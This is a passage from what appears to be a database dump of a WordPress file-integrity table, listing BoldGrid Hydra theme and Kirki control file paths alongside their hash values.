132368245339569E70FCC6D97A13,0xFC4B596904676FF565A44AEBE7F33A8E52CA89331E7F4F028DBE12A1858CB135,'',0,'?'),(0x99FE2A0E06BB93861EB9AF2AA8E29C3A,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/class-kirki-autoload.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/class-kirki-autoload.php',0,0xAF1B4241C684460D70DC65D1C76EFF80,0xAF1B4241C684460D70DC65D1C76EFF80,0x0FC6DCCF089111DF2DB4D89F3C206AD163F193BDA840A997794E36F3C080D722,'',0,'?'),(0xC3DCFF28930BE77491DA11FD89A1045B,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/background/background-legacy.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/background/background-legacy.js',0,0xBF7091E5B9347E1B3AFDD714E4CD3160,0xBF7091E5B9347E1B3AFDD714E4CD3160,0x4E2DB802ABDE966660AC627BD448DA04D0E70792278CEE5E4D04BDAFC98881D1,'',0,'?'),(0x0DAA8DA33A4FAC590541CAFD43E4147B,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/background/background.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/background/background.js',0,0x3DCAD20C1EF02224CB6689489A903E49,0x3DCAD20C1EF02224CB6689489A903E49,0x02AE008CC2ABC520A00111E8D3EDA38E71E1DF3B1B1A8B14911D1293456FF83F,'',0,'?'),(0x149225135AE3B46716C3AC4DA4DA91AD,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/background/class-kirki-control-background.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/background/class-kirki-control-background.php',0,0x04E6CD4A64F4C6BA33A9DCA996026F2F,0x04E6CD4A64F4C6BA33A9DCA996026F2F,0xAA37C943B9C21BDE74C959611297CFDD06DFB5EB95D307CDA3EC005C1C275417,'',0,'?'),(0x379FD4D768F57570B4339C9FF13ABE47,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/code/class-kirki-control-code.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/code/class-kirki-control-code.php',0,0x9584F68D4C29870D527E28919342F6F1,0x9584F68D4C29870D527E28919342F6F1,0x167264F50E8B617C08A8BA589D784012F3979F8591E0E5185C1383D8CB30BB1F,'',0,'?'),(0xA2B541C5B46DE0B79C06B246C0FA3FE4,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/code/code.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/code/code.js',0,0x6339F65F7051CEA6064CB5A3435D01D9,0x6339F65F7051CEA6064CB5A3435D01D9,0x5A75B725EC65FD63C2C7C764D14E621882313C6B13AC41B089334A957E6E76EA,'',0,'?'),(0xDECA1F15E80347EA916F16390335938E,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/color/class-kirki-control-color.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/color/class-kirki-control-color.php',0,0x4D13C733001C76FB77A54FBE3B280188,0x4D13C733001C76FB77A54FBE3B280188,0x49BB8D363EF583A8DE6D351FB877069E94A65FA282ABD6BFDF7C6E23D33FFBA0,'',0,'?'),(0x7F263E170F6C88A4A9495307226A5944,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/color/color.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/color/color.js',0,0xFC544D5AE4D30AEF50FF35BF95161CCE,0xFC544D5AE4D30AEF50FF35BF95161CCE,0x5D7A20271790ECD50A3964475D48D07AEF2994096E823011461830685E572CB4,'',0,'?'),(0xB3CE856B95008CF7D0ED06855B88FE67,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/color-palette/class-kirki-control-color-palette.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/color-palette/class-kirki-control-color-palette.php',0,0xC0A6CD8D6F5971499F813FB55BFD90AF,0xC0A6CD8D6F5971499F813FB55BFD90AF,0x4F64785ED6C4D3BC5C6E055E8B3D6434A4E4969DA3F8BCD4F246CEE21F7FE255,'',0,'?'),(0xACC9C40650A168F9A65C2ABAD43903D6,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/color-palette/color-palette.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/color-palette/color-palette.js',0,0xFD22F953590CAFCF167009D3221C37E8,0xFD22F953590CAFCF167009D3221C37E8,0xFC678BD255F8EBDC2BFC38E668CEE709E2B26F0D969B912BF6D81A3792D14B5E,'',0,'?'),(0xFF1732BF7C6392B33EDF89EB4FB76F0D,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/custom/class-kirki-control-custom.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/custom/class-kirki-control-custom.php',0,0x38FA4689209D8F843F0EFCA9CEEE149A,0x38FA4689209D8F843F0EFCA9CEEE149A,0xA039C37AFF4BBACB84644A0796B4ADE3703899CF6A5B17161AD351B18F3300BB,'',0,'?'),(0x83E4E484B71D754F380E2E6677580EE8,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dashicons/class-kirki-control-dashicons.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dashicons/class-kirki-control-dashicons.php',0,0x63BC7A70C4F3AF466CC5F8142851F666,0x63BC7A70C4F3AF466CC5F8142851F666,0x2D09B5CFA44C857A4479783BD5E7B06DA8EF8C1D74FE098B1DCC73A0BE1FB6DC,'',0,'?'),(0xABF395602139FE8D4B51E588A99E6FF7,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dashicons/dashicons.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dashicons/dashicons.js',0,0x1EB0321D57752F8E3CE739A904F07144,0x1EB0321D57752F8E3CE739A904F07144,0x211456170EF0FDC08EC59DBDEAF02DA23CCBB19CADF6BEE39E0079A421D32F12,'',0,'?'),(0x3F4892ACBAD9D010B88E0610D3F47E41,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/date/class-kirki-control-date.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/date/class-kirki-control-date.php',0,0xA1F079314275D08017E9F415BE900E13,0xA1F079314275D08017E9F415BE900E13,0xCE3F40FACED1ACD440DCE35D175B7E2065094D33F913CE7D7BED2D51EEFE02EE,'',0,'?'),(0x0CD96ECD7AB146957FB0380100356ED2,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/date/date.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/date/date.js',0,0xC5DD19591CEF0A15251E00FDBC3FFC2E,0xC5DD19591CEF0A15251E00FDBC3FFC2E,0x75724FDC90279D8991F33DD1238A47DA984B77216483F276D6F306DBEEFF2420,'',0,'?'),(0x7DD924902ADED74E34D3B40EACE1C123,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dimension/class-kirki-control-dimension.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dimension/class-kirki-control-dimension.php',0,0x5622A53A6856AED08FD6514E560429E1,0x5622A53A6856AED08FD6514E560429E1,0xE7EE54E54BCA793060D4EB19AE1D3D24E3F5F0BAF0C8C8BD27700A307C20A2B9,'',0,'?'),(0xB853D94B88737C44A34F70AE44FD8AD6,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dimension/dimension.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dimension/dimension.js',0,0x6C04A7175028DD692978E8BBE48BDE63,0x6C04A7175028DD692978E8BBE48BDE63,0xAD0C4B2C22D0DE5A5106200C916D843DEAB39F333A63C505B66D14D5E96521DC,'',0,'?'),(0x74BB0AF6618319FB1D4EFC478B16C2A7,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dimensions/class-kirki-control-dimensions.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dimensions/class-kirki-control-dimensions.php',0,0x8C40B0A5A35684A2E84683D761B302CA,0x8C40B0A5A35684A2E84683D761B302CA,0x1A2E69596188C96254DE22B4114E790BF20474A3E9DD99273960E7135DF36014,'',0,'?'),(0x05AEEB743968D37C9DF6BA28887C97AA,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dimensions/dimensions.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/dimensions/dimensions.js',0,0x9316AB7552E97EF2D7448C3DAB38CBA3,0x9316AB7552E97EF2D7448C3DAB38CBA3,0x16EDB6DEA2D79279B88B086ACE681463CC1490E8990B884E7ECAE8B2CADEB7AA,'',0,'?'),(0x98048822214201A04253C02447EFD339,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/editor/class-kirki-control-editor.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/editor/class-kirki-control-editor.php',0,0xCB98EA65C26FD67987CE87038DD84833,0xCB98EA65C26FD67987CE87038DD84833,0x717736756ADE63663B4B32FE0167CD43E6AB34B6ACECA1EB277D7D0E2BB6099D,'',0,'?'),(0xFE6578F2E5E6B9A39A3812802BEEDFED,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/editor/editor.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/editor/editor.js',0,0xBD833109D74C1D977FA9875755CA9B2D,0xBD833109D74C1D977FA9875755CA9B2D,0x05865C8952DB7FDE30CC10203FF41B4D5EE498BCD6FB361383811516CB839DB5,'',0,'?'),(0x7DF54273A8D310F371E5710CB93AA502,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/fontawesome/class-kirki-control-fontawesome.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/fontawesome/class-kirki-control-fontawesome.php',0,0xEFAF452EA504EF1A17AA5E4607482F15,0xEFAF452EA504EF1A17AA5E4607482F15,0x89DCC3303FE35DAE933CC5DF987A8CC53E1B80A4D94EDA9FFB7911E4BCF0F34D,'',0,'?'),(0x19A5C6AF9592462A409A8E5A77BA882E,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/fontawesome/fontawesome.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/fontawesome/fontawesome.js',0,0xC069078FB5087F2612BB79D3D2C558D0,0xC069078FB5087F2612BB79D3D2C558D0,0x0ADF898CD6C4A5C279505F39DD1C69A3770CF2D4AF66084AC748D8884146D343,'',0,'?'),(0xD75A26FDC1C7F686ABA9790681C48945,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/generic/class-kirki-control-generic.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/generic/class-kirki-control-generic.php',0,0x33FB90D2B604901E4FA23BFFE8DCE4EF,0x33FB90D2B604901E4FA23BFFE8DCE4EF,0x7C602174AAB1214A5E732782C89F4AA6273365E6CDEA16369EA9099DF6F0026E,'',0,'?'),(0xF6F75213F4B39967754D934F0AAFB837,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/generic/generic.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/generic/generic.js',0,0xA872EA1EC4442CCFDAB0C6CE033A0984,0xA872EA1EC4442CCFDAB0C6CE033A0984,0xABD7B7730670C4E88271DC1F60FEDA33047FDCCC58FA3F60152CC75AD04383B5,'',0,'?'),(0x7B85B57859C0E77EF68CB2A328BEBEED,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/image/class-kirki-control-image.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/image/class-kirki-control-image.php',0,0x70A3081DFFEAC71C55C366C46767DFB6,0x70A3081DFFEAC71C55C366C46767DFB6,0x13D128BB9D91A5EFCF52A760CF6B2963B79E309386AFA289A2831862655930F5,'',0,'?'),(0x580F5A33876660F023B87E6A455EA837,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/image/image.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/image/image.js',0,0x2F58A1CC1E785895B68E8AFEB602FAC6,0x2F58A1CC1E785895B68E8AFEB602FAC6,0xAAA93C227B82B3FD1237F39280BA1AC89437F6A6B6F50DC648E5ECD7949CF530,'',0,'?'),(0x8B04ABEEEB0319A238F5FDB32AB44522,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicheck/class-kirki-control-multicheck.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicheck/class-kirki-control-multicheck.php',0,0x05489265EB461052708463B00C7F783C,0x05489265EB461052708463B00C7F783C,0xC2310F8FA9001DF93CF9BC76D0AA8F2572B2203C2B3C54EE8DD9B9C7C1464E5C,'',0,'?'),(0x64723C625212FA3F0ECB0D623B6A9940,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicheck/multicheck.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicheck/multicheck.js',0,0xB08CE3B2172CC4FD54BE596685A0124A,0xB08CE3B2172CC4FD54BE596685A0124A,0xC9E32AEC472D9990EEA5826BFD647320BFCE267D0000FC99B2F58EAA1470C1F2,'',0,'?'),(0x8486FEB3F68C64D90489D512C409F526,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicolor/class-kirki-control-multicolor.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicolor/class-kirki-control-multicolor.php',0,0x62A24694CACA7E9C5BC9599601E4E7B2,0x62A24694CACA7E9C5BC9599601E4E7B2,0xE8ED372E8DF57EB0F66A841A82C95FEBAD1676C9FDCF1798A24D60D819EF4120,'',0,'?'),(0xF4262E09B5F757B076842F76BD58A4D6,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicolor/multicolor-legacy.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicolor/multicolor-legacy.js',0,0xE41D8482D4091FEF467C1A0537E8D4D9,0xE41D8482D4091FEF467C1A0537E8D4D9,0x021A6C1A161F5DEFA17D98C05FD6F616BDD0CAA771189EEE56BDE1BCE5F17C52,'',0,'?'),(0xB23A396149289697B519131F05C658BB,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicolor/multicolor.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/multicolor/multicolor.js',0,0x700E92C8124B6C0D44D7DC7E9EE0E16C,0x700E92C8124B6C0D44D7DC7E9EE0E16C,0x5AFDA3B9CB316F86EE6EEFC15B4DE4E1FE27CF62C4BCF5F324C93F2FA0223DF7,'',0,'?'),(0xCDB40BF7928716DC90A6623150BDFCDD,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/number/class-kirki-control-number.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/number/class-kirki-control-number.php',0,0xAFA95AFFCC6FEF8CA95A2BE1FE12DE0E,0xAFA95AFFCC6FEF8CA95A2BE1FE12DE0E,0x031649964B08854999FD606B1DFD4F30DC3B5FE06582217B7F4819D5D0EC1038,'',0,'?'),(0xDD998AC831FFBD382BC409559C90867C,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/number/number.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/number/number.js',0,0x6ACAA655301CB240E356BC2C34CD3D6D,0x6ACAA655301CB240E356BC2C34CD3D6D,0x019257A002BC18B9B3D4E41DE6A26681791037B3F304B2716DC962975B656147,'',0,'?'),(0x9527F249696AB37B2D7C8127D3BE8EFE,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/palette/class-kirki-control-palette.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/palette/class-kirki-control-palette.php',0,0xC1F68667882528D1907BEDDD57A26E08,0xC1F68667882528D1907BEDDD57A26E08,0xA070EA987EB06D58162DC36433FE2AC174D8B98CDC209151D465F957A3781844,'',0,'?'),(0xA26721A743AD9959714F1F5AC3E0A889,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/palette/palette.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/palette/palette.js',0,0x8C0CA33A8000137DFF0309B31762C86D,0x8C0CA33A8000137DFF0309B31762C86D,0xC5EF378E96403CA0936055460FD87CF01D7BDB634D1D7721BDF7955192E86094,'',0,'?'),(0xED1446484506DCEFA818440980983FAA,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/preset/class-kirki-control-preset.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/preset/class-kirki-control-preset.php',0,0xB12BFC134E27EBC7C5DCAB9B87E88AAB,0xB12BFC134E27EBC7C5DCAB9B87E88AAB,0x362AA4C90BF73B60AD2E22C850EF0697914EE03CD6B9278C809958E27795FE3C,'',0,'?'),(0x853F16C8B92E15903D86FADE69C3BF04,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/preset/preset.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/preset/preset.js',0,0xA403AB7D1FF12DF60DB59C131C699187,0xA403AB7D1FF12DF60DB59C131C699187,0x708E8BA33FF28C37ACDC92C0DD5100DA41B80C62EF3A2BCF5868424FDAE9E6A6,'',0,'?'),(0x3444888C8A848FB2179CC1C4C993FAE9,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/preset/set-setting-value.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/preset/set-setting-value.js',0,0x5DDD9E0D0DAD29D01FA0666DCEE0C3A4,0x5DDD9E0D0DAD29D01FA0666DCEE0C3A4,0x431E97C3FBCD3E4C5657B197950DD648A2DAC5C5A5F3ACC7892B72146BCD7AAD,'',0,'?'),(0xCEF9ECA510FB2AF9D7FA55E10D7071C3,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio/class-kirki-control-radio.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio/class-kirki-control-radio.php',0,0x1CFFE1BE0F0A7071015D108348D357F0,0x1CFFE1BE0F0A7071015D108348D357F0,0x5B50B511E02FC623008254B385021C410997BDF67EDD692BA55B53E1664B8504,'',0,'?'),(0x6EFB31E894EFD1219BDCE435DA00BA97,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio/radio.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio/radio.js',0,0x5B92469A132F7E1718743B3A5A95FAEF,0x5B92469A132F7E1718743B3A5A95FAEF,0x49AB4CEC3E634990FD579EF73E04F80998236E31F2F116259EBFAFCCE4D20C2D,'',0,'?'),(0x32A73C61A811E7B3DBACB5804349E706,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio-buttonset/class-kirki-control-radio-buttonset.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio-buttonset/class-kirki-control-radio-buttonset.php',0,0xEFBEA78B02343AEA99AF8325B04EF6E7,0xEFBEA78B02343AEA99AF8325B04EF6E7,0xF3B003D092CF06F7A0BFE535E59BDD95EB9DB23C6F1B56748AB4722FF24107D8,'',0,'?'),(0x9B904D06049E1D6D4756E2E7F38208B8,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio-buttonset/radio-buttonset.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio-buttonset/radio-buttonset.js',0,0x4AEFED4861CFC48E456F54F16568D0D1,0x4AEFED4861CFC48E456F54F16568D0D1,0x3FF5A43D8DC305EB48855E034E706200EA8519A8ECDE98F8E44551B895B154E5,'',0,'?'),(0x83BCEEAD9EEEBD1A7BC6CAE1E61B242C,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio-image/class-kirki-control-radio-image.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio-image/class-kirki-control-radio-image.php',0,0x25B55C0C747EF7F739D4BEC3C1FDEF7F,0x25B55C0C747EF7F739D4BEC3C1FDEF7F,0xE2D01752EFBA4D479FB61C7E0040B722B0DBCDBFB548357124526002D0B17E9C,'',0,'?'),(0x6946F670F0503BDF102E4A35DFB2501D,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio-image/radio-image.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/radio-image/radio-image.js',0,0xCE5ADAB54DF3672147E5A2A9B71BC0C5,0xCE5ADAB54DF3672147E5A2A9B71BC0C5,0x8E353F89D9243D147048B7F22346C8776479137ED36F63071DD7397E350307DF,'',0,'?'),(0x0B57F9A5099E5C6DF78621FCD3DF51A0,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/repeater/class-kirki-control-repeater.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/repeater/class-kirki-control-repeater.php',0,0xA0E3F8235B843F729A67EA87C08554F3,0xA0E3F8235B843F729A67EA87C08554F3,0x4A1F2001FB634D6432DA9A14B6626504281A46F084A02F96E8251665AF56E7C8,'',0,'?'),(0x850DAAB90CD18FF7C88A5C9EF3BEAA1C,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/repeater/class-kirki-settings-repeater-setting.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/repeater/class-kirki-settings-repeater-setting.php',0,0x133D80515EF1E9A2BAEE58000B4DA8B2,0x133D80515EF1E9A2BAEE58000B4DA8B2,0x63579617B2213557B36A72B1DD81B3C52FB3D37636ED57CD1792608DF608E1DD,'',0,'?'),(0x111EA3C95D7A0CDD98CBC8A44F7451E7,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/repeater/repeater.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/repeater/repeater.js',0,0xF2ADF6955B05928484AEE09D13F36036,0xF2ADF6955B05928484AEE09D13F36036,0x7D522FA38EEF65717F0CCDC4B7038D741763FBEC15BE0C8915F1D7B6C0C8E488,'',0,'?'),(0x679B62CCC20ED2067850B7316838FA25,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/select/class-kirki-control-select.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/select/class-kirki-control-select.php',0,0x7AFA15A65E8E79273D22799F5CE9B967,0x7AFA15A65E8E79273D22799F5CE9B967,0xDA63876A6D3E613DBB951F42E7127FF89C12C92F345F5D2EBDCAA1AF3567F228,'',0,'?'),(0xC49592912D7A6AAFB15F95DA3FC1180D,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/select/select.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/select/select.js',0,0xF21B8F6B1B2594FB3FD27BA00E929445,0xF21B8F6B1B2594FB3FD27BA00E929445,0x3F71C395AA6CC7C6293641D3B5997383FDB1B8B2AE7DAC38F7325801A76AB5FF,'',0,'?'),(0x4FF1309FF52BDB50BBB52F09B9D70F1B,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/slider/class-kirki-control-slider.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/slider/class-kirki-control-slider.php',0,0xBF9FEE3A19C64EAAAE36E11A9E3C0D78,0xBF9FEE3A19C64EAAAE36E11A9E3C0D78,0x49507CDC0D7AB6FA3FE450D386F9F1CEF82C22066FDF80364984505EF505040F,'',0,'?'),(0x8EDE8AE6862DD6989D3D99DA9C913AB0,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/slider/slider.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/slider/slider.js',0,0x5824E17D210C41668E4A9A03E2695661,0x5824E17D210C41668E4A9A03E2695661,0x2A646DB8899448F4294FC5A44A058D7A4F470D864BCD075147CAA1E9476C6784,'',0,'?'),(0xDA8A07DE955C946016CFD0E5E30F9369,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/sortable/class-kirki-control-sortable.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/sortable/class-kirki-control-sortable.php',0,0x81195770EBD9960237D4FD4FB11B2B4C,0x81195770EBD9960237D4FD4FB11B2B4C,0x867EDDF24FD6BA0D9E14170595043AEFC7183E5B472F53C61A9CDBA59C9A2504,'',0,'?'),(0x82387391E146747869DE2D962FC495F8,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/sortable/sortable.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/sortable/sortable.js',0,0x3B497EA2DD5DEC10E1E0E2FA4CE7D60A,0x3B497EA2DD5DEC10E1E0E2FA4CE7D60A,0x0BC9CDCCE971F46C6223FFAC82D7A6B4FE1FA41C4ACDFF1470EC71C36CD531F5,'',0,'?'),(0x9422F454AC3CC5DAAAF55E47AFD9BA50,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/switch/class-kirki-control-switch.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/switch/class-kirki-control-switch.php',0,0x5EBC52E4697FD1D1B8FF71FD9C549BE7,0x5EBC52E4697FD1D1B8FF71FD9C549BE7,0xA7745DE39BE84173A395A35FB7822ACB2B1FC2034257442E856AB67F26497E2F,'',0,'?'),(0x59F2F5942ED12C36CAEF86FF0EA082C6,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/switch/switch.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/switch/switch.js',0,0x9B5D2F7CA5889B697BFC2C877B436615,0x9B5D2F7CA5889B697BFC2C877B436615,0x7AF0C4713E56DC54FD012E0D0A5E4F22F28911B705B435AD195D61CC79940E41,'',0,'?'),(0x992A90DB530916989391E0967E79B84B,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/toggle/class-kirki-control-toggle.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/toggle/class-kirki-control-toggle.php',0,0xDA49D09C2776832E19EE75BDB78295A2,0xDA49D09C2776832E19EE75BDB78295A2,0xCA13372E4D5CA316B348295067884A315B849BC75F7998341543EB1EE58265BB,'',0,'?'),(0x1179F5A3923808A73B56C222D9F19AAB,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/toggle/toggle.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirk